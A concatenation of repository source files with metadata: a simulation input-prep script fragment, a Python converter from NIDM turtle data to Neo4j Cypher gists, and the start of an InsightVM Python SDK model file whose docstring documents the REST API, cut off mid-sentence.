lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_2.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_2.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
|
[
"songlin3@msu.edu"
] |
songlin3@msu.edu
|
833502e31a08a9076d125cf4da8732dc6e9093f4
|
4a3b651b892121b149406b0c11ded96dfbbbc309
|
/nidm_neo4j.py
|
50a797ccba84c66d1bd7196a27fa18d7c7e1d151
|
[] |
no_license
|
vsoch/nidm-neo4j
|
78c10f7540b4462997e57075fe55466fec2322f6
|
00c4a077e416ced19b6d3d246ac959e9a8ffb004
|
refs/heads/master
| 2021-01-10T01:36:01.665912
| 2015-10-15T20:17:46
| 2015-10-15T20:17:46
| 44,143,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,416
|
py
|
from nidmviewer.convert import get_lookups, get_nidm_keys, get_field_groups
from nidmviewer.convert import getjson
from rdflib.serializer import Serializer
from rdflib import Graph as graphrdf, plugin
import rdfextras
rdfextras.registerplugins()
plugin.register(
'json-ld',
Serializer,
'rdflib_jsonld.serializer',
'JsonLDSerializer')
import numpy
import json
import re
import os
import sys
ttl_file = sys.argv[1]
outfolder = sys.argv[2]
username = sys.argv[3]
repo_name = sys.argv[4]
if not os.path.exists(outfolder):
os.mkdir(outfolder)
ttl = getjson(ttl_file)
# create a node
def create_node(nid,node_type,uid,name,properties):
node_type = node_type.lower().replace(" ","").replace("'","").replace("-","")
name = name.replace("'","").replace("-","")
if len(properties) > 0:
property_string = ""
for p in range(len(properties)):
property_name = properties[p][0].lower().replace(" ","").replace("'","").replace("-","")
property_value = properties[p][1]
property_string = "%s %s : '%s'," %(property_string,property_name,property_value)
property_string = property_string[:-1]
return "create (_%s:%s { id : '%s', name :'%s', %s})\n" %(nid,node_type,uid,name,property_string)
else:
return "create (_%s:%s { id : '%s', name :'%s'})\n" %(nid,node_type,uid,name)
# create a relationship
def create_relation(nid1,nid2,relationship):
relationship = relationship.upper().replace("'","").replace("-","")
return "create _%s-[:`%s`]->_%s\n" %(nid1,relationship,nid2)
fields,lookup = get_lookups(ttl)
groups = get_field_groups(ttl)
manual_fields = get_nidm_keys()
for name,uri in manual_fields.iteritems():
if uri not in lookup:
lookup[uri] = name
# First we will save data structures to look up node ids based on URI
nodes = dict()
count = 1
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
result_id = result["@id"].encode("utf-8")
if result_id not in nodes:
nodes[result_id] = count
count +=1
# Define ids of relationships
labeluri = "http://www.w3.org/2000/01/rdf-schema#label"
relations = list()
neo4j = list()
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
node_id = nodes[result_id] # Here is the node_id
result_id = result["@id"]
label = lookup[rtype]
if labeluri in result:
name = result[labeluri][0]["@value"].encode("utf-8")
else:
name = "%s_%s" %(label,count)
# Find things we know about
data = [x for x in result.keys() if x in lookup.keys()]
data_labels = [lookup[d] for d in data]
# We will save a list of properties and values for the node
properties = []
for d in range(len(data)):
datum = data[d]
human_label = data_labels[d]
# If it just has an id, assume it's a relationship
if "@id" in result[datum][0].keys():
if result[datum][0]["@id"] in nodes:
relation_id = nodes[result[datum][0]["@id"]]
relationship = lookup[datum]
relations.append(create_relation(node_id,relation_id,relationship))
count+=1
# If it has type and value, it's a property
if "@value" in result[datum][0].keys():
property_name = lookup[datum]
property_value = result[datum][0]["@value"]
properties.append((property_name,property_value))
# Now create the node!
new_node = create_node(node_id,label,result_id,name,properties)
neo4j.append(new_node.encode("utf-8"))
# Now print to file!
filey = open("%s/graph.gist" %(outfolder),'w')
filey.writelines("= %s\n:neo4j-version: 2.0.0\n:author: Nidash Working Group\n:twitter: @nidm\n:tags: nidm:nidash:informatics:neuroimaging:data-structure\n'''\nThis is a neo4j graph to show the turtle file %s.\n'''\n[source, cypher]\n----\n" %(ttl_file,ttl_file))
for node in neo4j:
filey.writelines(node)
for relation in relations:
filey.writelines(relation)
filey.writelines("----\n//graph\nWe can use cypher to query the graph, here are some examples:\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c as coordinate, p as peak\n----\n//table\n'''\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c.name as name, c.coordinatevector as coordinate, p.equivalent_zstatistic as z, p.name as peak_name, p.pvalue_uncorrected as pvalue_uncorrected\n----\n//table\n'''\n== NIDM Working Group\n* link:http://nidm.nidash.org/[NIDM Standard]\n")
filey.close()
# Now write a Readme to link the gist
filey = open("%s/README.md" %(outfolder),'w')
filey.writelines("### %s\n" %(ttl_file))
filey.writelines("[view graph](http://gist.neo4j.org/?github-"+ username + "%2F" + repo_name + "%2F%2F" + outfolder + "%2Fgraph.gist)\n")
filey.close()
|
[
"vsochat@stanford.edu"
] |
vsochat@stanford.edu
|
aefe8b6b4ca8c34b9daa6f1101d9edf3096dba5a
|
e7a5e140ccacc10a4c51b66fa5942974330cce2c
|
/py_insightvm_sdk/models/discovery_search_criteria.py
|
1d1de193d4cc42310dabe5624fcece0162396b08
|
[
"Apache-2.0"
] |
permissive
|
greenpau/py_insightvm_sdk
|
38864c7e88000181de5c09302b292b01d90bb88c
|
bd881f26e14cb9f0f9c47927469ec992de9de8e6
|
refs/heads/master
| 2020-04-21T08:22:31.431529
| 2020-02-27T02:25:46
| 2020-02-27T02:25:46
| 169,417,392
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 54,623
|
py
|
# coding: utf-8
"""
InsightVM API
# Overview This guide documents the InsightVM Application Programming Interface (API) Version 3. This API supports the Representation State Transfer (REST) design pattern. Unless noted otherwise this API accepts and produces the `application/json` media type. This API uses Hypermedia as the Engine of Application State (HATEOAS) and is hypermedia friendly. All API connections must be made to the security console using HTTPS. ## Versioning Versioning is specified in the URL and the base path of this API is: `https://<host>:<port>/api/3/`. ## Specification An <a target=\"_blank\" href=\"https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md\">OpenAPI v2</a> specification (also known as Swagger 2) of this API is available. Tools such as <a target=\"_blank\" href=\"https://github.com/swagger-api/swagger-codegen\">swagger-codegen</a> can be used to generate an API client in the language of your choosing using this specification document. <p class=\"openapi\">Download the specification: <a class=\"openapi-button\" target=\"_blank\" download=\"\" href=\"/api/3/json\"> Download </a></p> ## Authentication Authorization to the API uses HTTP Basic Authorization (see <a target=\"_blank\" href=\"https://www.ietf.org/rfc/rfc2617.txt\">RFC 2617</a> for more information). Requests must supply authorization credentials in the `Authorization` header using a Base64 encoded hash of `\"username:password\"`. <!-- ReDoc-Inject: <security-definitions> --> ### 2FA This API supports two-factor authentication (2FA) by supplying an authentication token in addition to the Basic Authorization. The token is specified using the `Token` request header. To leverage two-factor authentication, this must be enabled on the console and be configured for the account accessing the API. ## Resources ### Naming Resource names represent nouns and identify the entity being manipulated or accessed. All collection resources are pluralized to indicate to the client they are interacting with a collection of multiple resources of the same type. Singular resource names are used when there exists only one resource available to interact with. The following naming conventions are used by this API: | Type | Case | | --------------------------------------------- | ------------------------ | | Resource names | `lower_snake_case` | | Header, body, and query parameters parameters | `camelCase` | | JSON fields and property names | `camelCase` | #### Collections A collection resource is a parent resource for instance resources, but can itself be retrieved and operated on independently. Collection resources use a pluralized resource name. The resource path for collection resources follow the convention: ``` /api/3/{resource_name} ``` #### Instances An instance resource is a \"leaf\" level resource that may be retrieved, optionally nested within a collection resource. Instance resources are usually retrievable with opaque identifiers. The resource path for instance resources follows the convention: ``` /api/3/{resource_name}/{instance_id}... ``` ## Verbs The following HTTP operations are supported throughout this API. The general usage of the operation and both its failure and success status codes are outlined below. | Verb | Usage | Success | Failure | | --------- | ------------------------------------------------------------------------------------- | ----------- | -------------------------------------------------------------- | | `GET` | Used to retrieve a resource by identifier, or a collection of resources by type. | `200` | `400`, `401`, `402`, `404`, `405`, `408`, `410`, `415`, `500` | | `POST` | Creates a resource with an application-specified identifier. | `201` | `400`, `401`, `404`, `405`, `408`, `413`, `415`, `500` | | `POST` | Performs a request to queue an asynchronous job. | `202` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Creates a resource with a client-specified identifier. | `200` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Performs a full update of a resource with a specified identifier. | `201` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `DELETE` | Deletes a resource by identifier or an entire collection of resources. | `204` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `OPTIONS` | Requests what operations are available on a resource. | `200` | `401`, `404`, `405`, `408`, `500` | ### Common Operations #### OPTIONS All resources respond to the `OPTIONS` request, which allows discoverability of available operations that are supported. The `OPTIONS` response returns the acceptable HTTP operations on that resource within the `Allow` header. The response is always a `200 OK` status. ### Collection Resources Collection resources can support the `GET`, `POST`, `PUT`, and `DELETE` operations. #### GET The `GET` operation invoked on a collection resource indicates a request to retrieve all, or some, of the entities contained within the collection. This also includes the optional capability to filter or search resources during the request. The response from a collection listing is a paginated document. See [hypermedia links](#section/Overview/Paging) for more information. #### POST The `POST` is a non-idempotent operation that allows for the creation of a new resource when the resource identifier is not provided by the system during the creation operation (i.e. the Security Console generates the identifier). The content of the `POST` request is sent in the request body. The response to a successful `POST` request should be a `201 CREATED` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. The `POST` to a collection resource can also be used to interact with asynchronous resources. In this situation, instead of a `201 CREATED` response, the `202 ACCEPTED` response indicates that processing of the request is not fully complete but has been accepted for future processing. This request will respond similarly with a `Location` header with link to the job-oriented asynchronous resource that was created and/or queued. #### PUT The `PUT` is an idempotent operation that either performs a create with user-supplied identity, or a full replace or update of a resource by a known identifier. The response to a `PUT` operation to create an entity is a `201 Created` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. `PUT` on a collection resource replaces all values in the collection. The typical response to a `PUT` operation that updates an entity is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. #### DELETE The `DELETE` is an idempotent operation that physically deletes a resource, or removes an association between resources. The typical response to a `DELETE` operation is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. ### Instance Resources Instance resources can support the `GET`, `PUT`, `POST`, `PATCH` and `DELETE` operations. #### GET Retrieves the details of a specific resource by its identifier. The details retrieved can be controlled through property selection and property views. The content of the resource is returned within the body of the response in the acceptable media type. #### PUT Allows for and idempotent \"full update\" (complete replacement) on a specific resource. If the resource does not exist, it will be created; if it does exist, it is completely overwritten. Any omitted properties in the request are assumed to be undefined/null. For \"partial updates\" use `POST` or `PATCH` instead. The content of the `PUT` request is sent in the request body. The identifier of the resource is specified within the URL (not the request body). The response to a successful `PUT` request is a `201 CREATED` to represent the created status, with a valid `Location` header field set to the URI that can be used to access to the newly created (or fully replaced) resource. #### POST Performs a non-idempotent creation of a new resource. The `POST` of an instance resource most commonly occurs with the use of nested resources (e.g. searching on a parent collection resource). The response to a `POST` of an instance resource is typically a `200 OK` if the resource is non-persistent, and a `201 CREATED` if there is a resource created/persisted as a result of the operation. This varies by endpoint. #### PATCH The `PATCH` operation is used to perform a partial update of a resource. `PATCH` is a non-idempotent operation that enforces an atomic mutation of a resource. Only the properties specified in the request are to be overwritten on the resource it is applied to. If a property is missing, it is assumed to not have changed. #### DELETE Permanently removes the individual resource from the system. If the resource is an association between resources, only the association is removed, not the resources themselves. A successful deletion of the resource should return `204 NO CONTENT` with no response body. This operation is not fully idempotent, as follow-up requests to delete a non-existent resource should return a `404 NOT FOUND`. ## Requests Unless otherwise indicated, the default request body media type is `application/json`. ### Headers Commonly used request headers include: | Header | Example | Purpose | | ------------------ | --------------------------------------------- | ---------------------------------------------------------------------------------------------- | | `Accept` | `application/json` | Defines what acceptable content types are allowed by the client. For all types, use `*/*`. | | `Accept-Encoding` | `deflate, gzip` | Allows for the encoding to be specified (such as gzip). | | `Accept-Language` | `en-US` | Indicates to the server the client's locale (defaults `en-US`). | | `Authorization ` | `Basic Base64(\"username:password\")` | Basic authentication | | `Token ` | `123456` | Two-factor authentication token (if enabled) | ### Dates & Times Dates and/or times are specified as strings in the ISO 8601 format(s). The following formats are supported as input: | Value | Format | Notes | | --------------------------- | ------------------------------------------------------ | ----------------------------------------------------- | | Date | YYYY-MM-DD | Defaults to 12 am UTC (if used for a date & time | | Date & time only | YYYY-MM-DD'T'hh:mm:ss[.nnn] | Defaults to UTC | | Date & time in UTC | YYYY-MM-DD'T'hh:mm:ss[.nnn]Z | | | Date & time w/ offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm | | | Date & time w/ zone-offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm[<zone-id>] | | ### Timezones Timezones are specified in the regional zone format, such as `\"America/Los_Angeles\"`, `\"Asia/Tokyo\"`, or `\"GMT\"`. ### Paging Pagination is supported on certain collection resources using a combination of two query parameters, `page` and `size`. As these are control parameters, they are prefixed with the underscore character. The page parameter dictates the zero-based index of the page to retrieve, and the `size` indicates the size of the page. For example, `/resources?page=2&size=10` will return page 3, with 10 records per page, giving results 21-30. The maximum page size for a request is 500. ### Sorting Sorting is supported on paginated resources with the `sort` query parameter(s). The sort query parameter(s) supports identifying a single or multi-property sort with a single or multi-direction output. The format of the parameter is: ``` sort=property[,ASC|DESC]... ``` Therefore, the request `/resources?sort=name,title,DESC` would return the results sorted by the name and title descending, in that order. The sort directions are either ascending `ASC` or descending `DESC`. With single-order sorting, all properties are sorted in the same direction. To sort the results with varying orders by property, multiple sort parameters are passed. For example, the request `/resources?sort=name,ASC&sort=title,DESC` would sort by name ascending and title descending, in that order. ## Responses The following response statuses may be returned by this API. | Status | Meaning | Usage | | ------ | ------------------------ |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `200` | OK | The operation performed without error according to the specification of the request, and no more specific 2xx code is suitable. | | `201` | Created | A create request has been fulfilled and a resource has been created. The resource is available as the URI specified in the response, including the `Location` header. | | `202` | Accepted | An asynchronous task has been accepted, but not guaranteed, to be processed in the future. | | `400` | Bad Request | The request was invalid or cannot be otherwise served. The request is not likely to succeed in the future without modifications. | | `401` | Unauthorized | The user is unauthorized to perform the operation requested, or does not maintain permissions to perform the operation on the resource specified. | | `403` | Forbidden | The resource exists to which the user has access, but the operating requested is not permitted. | | `404` | Not Found | The resource specified could not be located, does not exist, or an unauthenticated client does not have permissions to a resource. | | `405` | Method Not Allowed | The operations may not be performed on the specific resource. Allowed operations are returned and may be performed on the resource. | | `408` | Request Timeout | The client has failed to complete a request in a timely manner and the request has been discarded. | | `413` | Request Entity Too Large | The request being provided is too large for the server to accept processing. | | `415` | Unsupported Media Type | The media type is not supported for the requested resource. | | `500` | Internal Server Error | An internal and unexpected error has occurred on the server at no fault of the client. | ### Security The response statuses 401, 403 and 404 need special consideration for security purposes. As necessary, error statuses and messages may be obscured to strengthen security and prevent information exposure. The following is a guideline for privileged resource response statuses: | Use Case | Access | Resource | Permission | Status | | ------------------------------------------------------------------ | ------------------ |------------------- | ------------ | ------------ | | Unauthenticated access to an unauthenticated resource. | Unauthenticated | Unauthenticated | Yes | `20x` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Authenticated | No | `401` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Non-existent | No | `401` | | Authenticated access to a unauthenticated resource. | Authenticated | Unauthenticated | Yes | `20x` | | Authenticated access to an authenticated, unprivileged resource. | Authenticated | Authenticated | No | `404` | | Authenticated access to an authenticated, privileged resource. | Authenticated | Authenticated | Yes | `20x` | | Authenticated access to an authenticated, non-existent resource | Authenticated | Non-existent | Yes | `404` | ### Headers Commonly used response headers include: | Header | Example | Purpose | | -------------------------- | --------------------------------- | --------------------------------------------------------------- | | `Allow` | `OPTIONS, GET` | Defines the allowable HTTP operations on a resource. | | `Cache-Control` | `no-store, must-revalidate` | Disables caching of resources (as they are all dynamic). | | `Content-Encoding` | `gzip` | The encoding of the response body (if any). | | `Location` | | Refers to the URI of the resource created by a request. | | `Transfer-Encoding` | `chunked` | Specified the encoding used to transform response. | | `Retry-After` | 5000 | Indicates the time to wait before retrying a request. | | `X-Content-Type-Options` | `nosniff` | Disables MIME type sniffing. | | `X-XSS-Protection` | `1; mode=block` | Enables XSS filter protection. | | `X-Frame-Options` | `SAMEORIGIN` | Prevents rendering in a frame from a different origin. | | `X-UA-Compatible` | `IE=edge,chrome=1` | Specifies the browser mode to render in. | ### Format When `application/json` is returned in the response body it is always pretty-printed (indented, human readable output). Additionally, gzip compression/encoding is supported on all responses. #### Dates & Times Dates or times are returned as strings in the ISO 8601 'extended' format. When a date and time is returned (instant) the value is converted to UTC. For example: | Value | Format | Example | | --------------- | ------------------------------ | --------------------- | | Date | `YYYY-MM-DD` | 2017-12-03 | | Date & Time | `YYYY-MM-DD'T'hh:mm:ss[.nnn]Z` | 2017-12-03T10:15:30Z | #### Content In some resources a Content data type is used. This allows for multiple formats of representation to be returned within resource, specifically `\"html\"` and `\"text\"`. The `\"text\"` property returns a flattened representation suitable for output in textual displays. The `\"html\"` property returns an HTML fragment suitable for display within an HTML element. Note, the HTML returned is not a valid stand-alone HTML document. #### Paging The response to a paginated request follows the format: ```json { resources\": [ ... ], \"page\": { \"number\" : ..., \"size\" : ..., \"totalResources\" : ..., \"totalPages\" : ... }, \"links\": [ \"first\" : { \"href\" : \"...\" }, \"prev\" : { \"href\" : \"...\" }, \"self\" : { \"href\" : \"...\" }, \"next\" : { \"href\" : \"...\" }, \"last\" : { \"href\" : \"...\" } ] } ``` The `resources` property is an array of the resources being retrieved from the endpoint, each which should contain at minimum a \"self\" relation hypermedia link. The `page` property outlines the details of the current page and total possible pages. The object for the page includes the following properties: - number - The page number (zero-based) of the page returned. - size - The size of the pages, which is less than or equal to the maximum page size. - totalResources - The total amount of resources available across all pages. - totalPages - The total amount of pages. The last property of the paged response is the `links` array, which contains all available hypermedia links. For paginated responses, the \"self\", \"next\", \"previous\", \"first\", and \"last\" links are returned. The \"self\" link must always be returned and should contain a link to allow the client to replicate the original request against the collection resource in an identical manner to that in which it was invoked. The \"next\" and \"previous\" links are present if either or both there exists a previous or next page, respectively. The \"next\" and \"previous\" links have hrefs that allow \"natural movement\" to the next page, that is all parameters required to move the next page are provided in the link. The \"first\" and \"last\" links provide references to the first and last pages respectively. Requests outside the boundaries of the pageable will result in a `404 NOT FOUND`. Paginated requests do not provide a \"stateful cursor\" to the client, nor does it need to provide a read consistent view. Records in adjacent pages may change while pagination is being traversed, and the total number of pages and resources may change between requests within the same filtered/queries resource collection. #### Property Views The \"depth\" of the response of a resource can be configured using a \"view\". All endpoints supports two views that can tune the extent of the information returned in the resource. The supported views are `summary` and `details` (the default). View are specified using a query parameter, in this format: ```bash /<resource>?view={viewName} ``` #### Error Any error responses can provide a response body with a message to the client indicating more information (if applicable) to aid debugging of the error. All 40x and 50x responses will return an error response in the body. The format of the response is as follows: ```json { \"status\": <statusCode>, \"message\": <message>, \"links\" : [ { \"rel\" : \"...\", \"href\" : \"...\" } ] } ``` The `status` property is the same as the HTTP status returned in the response, to ease client parsing. The message property is a localized message in the request client's locale (if applicable) that articulates the nature of the error. The last property is the `links` property. This may contain additional [hypermedia links](#section/Overview/Authentication) to troubleshoot. #### Search Criteria <a section=\"section/Responses/SearchCriteria\"></a> Multiple resources make use of search criteria to match assets. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The operator is a type and property-specific operating performed on the filtered property. The valid values for fields and operators are outlined in the table below. Every filter also defines one or more values that are supplied to the operator. The valid values vary by operator and are outlined below. ##### Fields The following table outlines the search criteria fields and the available operators: | Field | Operators | | --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | `alternate-address-type` | `in` | | `container-image` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-like` ` not-like` | | `container-status` | `is` ` is-not` | | `containers` | `are` | | `criticality-tag` | `is` ` is-not` ` is-greater-than` ` is-less-than` ` is-applied` ` is-not-applied` | | `custom-tag` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-applied` ` is-not-applied` | | `cve` | `is` ` is-not` ` contains` ` does-not-contain` | | `cvss-access-complexity` | `is` ` is-not` | | `cvss-authentication-required` | `is` ` is-not` | | `cvss-access-vector` | `is` ` is-not` | | `cvss-availability-impact` | `is` ` is-not` | | `cvss-confidentiality-impact` | `is` ` is-not` | | `cvss-integrity-impact` | `is` ` is-not` | | `cvss-v3-confidentiality-impact` | `is` ` is-not` | | `cvss-v3-integrity-impact` | `is` ` is-not` | | `cvss-v3-availability-impact` | `is` ` is-not` | | `cvss-v3-attack-vector` | `is` ` is-not` | | `cvss-v3-attack-complexity` | `is` ` is-not` | | `cvss-v3-user-interaction` | `is` ` is-not` | | `cvss-v3-privileges-required` | `is` ` is-not` | | `host-name` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-empty` ` is-not-empty` ` is-like` ` not-like` | | `host-type` | `in` ` not-in` | | `ip-address` | `is` ` is-not` ` in-range` ` not-in-range` ` is-like` ` not-like` | | `ip-address-type` | `in` ` not-in` | | `last-scan-date` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `location-tag` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-applied` ` is-not-applied` | | `mobile-device-last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `open-ports` | `is` ` is-not` ` in-range` | | `operating-system` | `contains` ` does-not-contain` ` is-empty` ` is-not-empty` | | `owner-tag` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` ` is-applied` ` is-not-applied` | | `pci-compliance` | `is` | | `risk-score` | `is` ` is-not` ` in-range` ` greater-than` ` less-than` | | `service-name` | `contains` ` does-not-contain` | | `site-id` | `in` ` not-in` | | `software` | `contains` ` does-not-contain` | | `vAsset-cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `vAsset-datacenter` | `is` ` is-not` | | `vAsset-host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `vAsset-power-state` | `in` ` not-in` | | `vAsset-resource-pool-path` | `contains` ` does-not-contain` | | `vulnerability-assessed` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vulnerability-category` | `is` ` is-not` ` starts-with` ` ends-with` ` contains` ` does-not-contain` | | `vulnerability-cvss-v3-score` | `is` ` is-not` | | `vulnerability-cvss-score` | `is` ` is-not` ` in-range` ` is-greater-than` ` is-less-than` | | `vulnerability-exposures` | `includes` ` does-not-include` | | `vulnerability-title` | `contains` ` does-not-contain` ` is` ` is-not` ` starts-with` ` ends-with` | | `vulnerability-validated-status` | `are` | ##### Enumerated Properties The following fields have enumerated values: | Field | Acceptable Values | | ----------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `alternate-address-type` | 0=IPv4, 1=IPv6 | | `containers` | 0=present, 1=not present | | `container-status` | `created` `running` `paused` `restarting` `exited` `dead` `unknown` | | `cvss-access-complexity` | <ul><li><code>L</code> = Low</li><li><code>M</code> = Medium</li><li><code>H</code> = High</li></ul> | | `cvss-integrity-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-confidentiality-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-availability-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-access-vector` | <ul><li><code>L</code> = Local</li><li><code>A</code> = Adjacent</li><li><code>N</code> = Network</li></ul> | | `cvss-authentication-required` | <ul><li><code>N</code> = None</li><li><code>S</code> = Single</li><li><code>M</code> = Multiple</li></ul> | | `cvss-v3-confidentiality-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-integrity-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-availability-impact` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-attack-vector` | <ul><li><code>N</code> = Network</li><li><code>A</code> = Adjacent</li><li><code>L</code> = Local</li><li><code>P</code> = Physical</li></ul> | | `cvss-v3-attack-complexity` | <ul><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-user-interaction` | <ul><li><code>N</code> = None</li><li><code>R</code> = Required</li></ul> | | `cvss-v3-privileges-required` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `host-type` | 0=Unknown, 1=Guest, 2=Hypervisor, 3=Physical, 4=Mobile | | `ip-address-type` | 0=IPv4, 1=IPv6 | | `pci-compliance` | 0=fail, 1=pass | | `vulnerability-validated-status` | 0=present, 1=not present | ##### Operator Properties <a section=\"section/Responses/SearchCriteria/OperatorProperties\"></a> The following table outlines which properties are required for each operator and the appropriate data type(s): | Operator | `value` | `lower` | `upper` | | ----------------------|-----------------------|-----------------------|-----------------------| | `are` | `string` | | | | `contains` | `string` | | | | `does-not-contain` | `string` | | | | `ends with` | `string` | | | | `in` | `Array[ string ]` | | | | `in-range` | | `numeric` | `numeric` | | `includes` | `Array[ string ]` | | | | `is` | `string` | | | | `is-applied` | | | | | `is-between` | | `numeric` | `numeric` | | `is-earlier-than` | `numeric` | | | | `is-empty` | | | | | `is-greater-than` | `numeric` | | | | `is-on-or-after` | `string` (yyyy-MM-dd) | | | | `is-on-or-before` | `string` (yyyy-MM-dd) | | | | `is-not` | `string` | | | | `is-not-applied` | | | | | `is-not-empty` | | | | | `is-within-the-last` | `numeric` | | | | `less-than` | `string` | | | | `like` | `string` | | | | `not-contains` | `string` | | | | `not-in` | `Array[ string ]` | | | | `not-in-range` | | `numeric` | `numeric` | | `not-like` | `string` | | | | `starts-with` | `string` | | | #### Discovery Connection Search Criteria <a section=\"section/Responses/DiscoverySearchCriteria\"></a> Dynamic sites make use of search criteria to match assets from a discovery connection. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The list of supported fields vary depending on the type of discovery connection configured for the dynamic site (e.g vSphere, ActiveSync, etc.). The operator is a type and property-specific operating performed on the filtered property. The valid values for fields outlined in the tables below and are grouped by the type of connection. Every filter also defines one or more values that are supplied to the operator. See <a href=\"#section/Responses/SearchCriteria/OperatorProperties\">Search Criteria Operator Properties</a> for more information on the valid values for each operator. ##### Fields (ActiveSync) This section documents search criteria information for ActiveSync discovery connections. The discovery connections must be one of the following types: `\"activesync-ldap\"`, `\"activesync-office365\"`, or `\"activesync-powershell\"`. The following table outlines the search criteria fields and the available operators for ActiveSync connections: | Field | Operators | | --------------------------------- | ------------------------------------------------------------- | | `last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `operating-system` | `contains` ` does-not-contain` | | `user` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (AWS) This section documents search criteria information for AWS discovery connections. The discovery connections must be the type `\"aws\"`. The following table outlines the search criteria fields and the available operators for AWS connections: | Field | Operators | | ----------------------- | ------------------------------------------------------------- | | `availability-zone` | `contains` ` does-not-contain` | | `guest-os-family` | `contains` ` does-not-contain` | | `instance-id` | `contains` ` does-not-contain` | | `instance-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `instance-state` | `in` ` not-in` | | `instance-type` | `in` ` not-in` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `region` | `in` ` not-in` | | `vpc-id` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (DHCP) This section documents search criteria information for DHCP discovery connections. The discovery connections must be the type `\"dhcp\"`. The following table outlines the search criteria fields and the available operators for DHCP connections: | Field | Operators | | --------------- | ------------------------------------------------------------- | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `mac-address` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (Sonar) This section documents search criteria information for Sonar discovery connections. The discovery connections must be the type `\"sonar\"`. The following table outlines the search criteria fields and the available operators for Sonar connections: | Field | Operators | | ------------------- | -------------------- | | `search-domain` | `contains` ` is` | | `ip-address` | `in-range` ` is` | | `sonar-scan-date` | `is-within-the-last` | ##### Fields (vSphere) This section documents search criteria information for vSphere discovery connections. The discovery connections must be the type `\"vsphere\"`. The following table outlines the search criteria fields 